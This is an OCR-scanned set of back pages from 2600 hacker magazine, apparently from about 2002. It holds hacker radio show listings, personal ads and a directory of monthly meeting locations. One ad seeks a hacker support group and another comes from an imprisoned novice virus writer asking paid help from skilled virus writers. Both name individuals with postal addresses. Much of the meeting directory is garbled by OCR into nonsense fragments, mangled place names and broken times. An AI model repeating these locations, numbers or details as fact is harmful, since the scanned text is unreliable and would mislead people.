location 66.28.48.80:9474 with Winamp or Real Player to hear
Hackermind, the show focusing on the opinions of those in the hacker
world. For more details, check out www.hackermind.net.

OFF THE HOOK is the weekly one hour hacker radio show
presented Tuesday nights at 8:00 pm ET on WBAI 99.5 FM in New
York City. You can also tune in over the net at
www.2600.com/offthehook or on shortwave to North and South
America at 7415 khz. Archives of all shows dating back to 1988 can
be found at the 2600 site, now in mp3 format! Your feedback is
welcome at oth@2600.com.


Personals 


STARTING A HAXOR SUPPORT GROUP and need participation
from experienced and inexperienced haxors, crackers, and
phreakers. If you would like to join this FREE service, write me at
the address below. You may be asked to search for information on
the 'net to assist others with less experience or submit knowledge on
techniques you know. Also, looking for political views and electronic
projects as well as ideas for hacking for a magazine I am starting.
Write to me at: Larry Heath Wheeler, Rt 1 Box 150-817592, Fort
Stockton, Texas 79735. All inquiries will be answered.

IMPRISONED VIRUS WRITER. Though I am still a novice at
virus technology, I do wish to become more knowledgeable through
correspondence with skilled virus writers. I will gladly pay for such
assistance. Daniel McAvey #646268, Rt. 1, Box 150, Tennessee
Colony, TX 75884.


ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even
think about trying to take out an ad unless you subscribe! All ads are
free and there is no amount of money we will accept for a
non-subscriber ad. We hope that's clear. Of course, we reserve the right to
pass judgment on your ad and not print it if it's amazingly stupid or
has nothing at all to do with the hacker world. We make no guarantee
as to the honesty, righteousness, sanity, etc. of the people advertising
here. Contact them at your peril. All submissions are for ONE
ISSUE ONLY! If you want to run your ad more than once you must
resubmit it each time. Don't expect us to run more than one ad for you
in a single issue either. Include your address label or a photocopy so
we know you're a subscriber. Send your ad to 2600 Marketplace, PO
Box 99, Middle Island, NY 11953. Deadline for Summer issue:
6/1/02.

Assuleng, near the payphone.

CANADA 

Alberta

Calgary: Bau Claire Market ee 
court by er pee i 
merty thes! mitt 
Edmonton: deni Citi Centres: 
Lower eki ves ney Todi court” 
by the peu panies ¿ 







Vanconvers ¿Pacific 
Fair, one Tevel ae a 
lewel by iy phones: p 
Victoria Es Co fo foun 
by AR JTA 

New Brunswick 
Mondim: Ground E has Neer, 
Ba) Main SL 









Barrie: Wilt 

Bryne Drive. 

Hamilton: Seve food! i: 
court by payphones and Pr Í 
King. 730 e rF | 
Mor dis all | Co 

10 Gauchetie 


D 


Ey 
"Chane 
Broad aK a 
9299011. 0 
Hull: In La 
oppositie 


tevel 7 pm 


Manchester: T 
Whitworth 


Internet rt me bargat e T pm. ii i ‘i 


FRANCE
Paris: Place d'tahe . 







Mods Ae : blin" 5 

GE z E a yd RY 

Athens: Outside tho bos 

paswtiriou on ihe comer of Patision 
and §tourmari. 7 pm 


All meetings take place on the first Friday of the month, Unless otherwise noted, they start at 5 pm local time. 
To start a meeting in your city, leave a message & phone number at (631) 751-2600 or send email to meetings@2600.com.







pa Binsa Noble s130 


i oneahpro: Indian Mall 









Auckland: London Bar, upstairs, 
Msn St ¡Auckland Central, 






Christehur - Sve Cafe, comer of 
igh St; ¡and Manchester St 6 pm 


'ellington: «bi ind 5 Bar in Cuba 


NORWAY
Oslo: Oslo Sentral Train Station.


ronda Ries Cafe in Nor 
Stargard E nccilinla: Art Cartel 


Bring blug bonk 7 pm. 
RUSSIA 


| Moscow: ‘Burger: ‘Queen gafa Bear 
(Telephone. i Sh- 























ques Arkansas 






windows. a 





by the 
i 


| eth adas Pizzena on 
E (Vons Shopping 


E l ohani (415) 
wb 5, 9806, 
apbell): Orchard 
p et Cale onthe 
Sentral Ave, and E 





dal 


i + paa nA . ona i 
al 


Meriden Square wat 
Legir. 6 pm. —_ 


"Ahing: Ponder ai in 


thre food court, 6 pm. 


Es 


ih I 
W uy A EN 
food court. 





3 City (independence): 
cs & Noble 10120 East 










9/84. 6 pm 


dale 
Pocatello College Market, 604 
South Sth ireet. r 

| amg 
Chica; 
Gren É 





Mall food court by the fountain. 
Ohio 

Akron: Arubica on W.: Marker 

Street, kupena of Hawkins, W 

























(Heitor ord): s): CybeePete's 
l! ne 665 Broadway Ave. 
"Convention ¡Center 
A basement, far tack of 
buliding in carpeted payphone area 
Tpm, 
Dayton: At the Mariona reine 
Dayton Mall. 6 pm. 


iy 
4 
Vey ae 











Missouri 


St. 
Louis: Galleria, Highway A) de 
Bren wood, elevated section, fwd 
area, by the thewters. 


did: Barnes & Noble on 


efield feross from the mail 


Nebraska


F View Mall Barnet & 





miri. mej y nbanés \ oat the leew 
level: between the. ein de 
arcade. 


¿de oh neat Tieas sae | 
oe ij Vermont tn 
bein 
oe 














Wisconsin
Madison: Lain South. 
Bundall Ave.) on the lower le M 
the Martin Luther King Je Lounge 
iy the payphones. Payphond! 1908) 
251-9909. 
Milwaukee (Wiitimalosa): May- 
fair Mall on Hwy 100 & Nonh Ave 
in Room Ulio Gi 50, pa 








2600 Magazine 





Dutch Payphones 





Amsterdam. Increasingly hard to find, this phone only accepts coins.

Amsterdam. Increasingly easy to find, this phone doesn't accept coins.





and cards. 


Photos by Daniel Langdon Jones 


Come and visit our website and see our vast array of payphone 
photos that we’ve compiled! http://www.2600.com 








More Foreign Payphones





Phnom Penh, Cambodia. A card-only phone.
Photo by John Bullock

Phnom Penh, Cambodia. Close-up view.
Photo by John Bullock

Willemstad, Curacao. A shape and color so rarely seen in the States.
Photo by Phillip Bettac Zoufal

Kyiv, Ukraine. This rotary phone is said to only take pre-paid smart cards, although it's
rather hard to figure out where they would go.
Photo by an anonymous Canadian


Look on the other side of this page for even more photos! 









